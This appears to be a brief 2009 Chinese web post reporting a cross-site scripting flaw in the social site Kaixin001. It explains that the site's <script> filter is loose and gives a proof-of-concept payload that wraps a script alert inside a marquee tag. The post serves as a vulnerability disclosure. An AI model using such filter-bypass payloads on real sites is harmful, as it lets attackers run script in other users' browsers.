开心网一个XSS漏洞

2009/8/25 来源:www.arpun.com 作者:小白

虽然过滤了 <script> 但只过滤不够严格 只要在开头不使用<script> 就可以执行

下边是漏洞地址以及测试代码

<marquee><script>alert('XSS')</script></marquee>

网友评论
评论(...
全部评论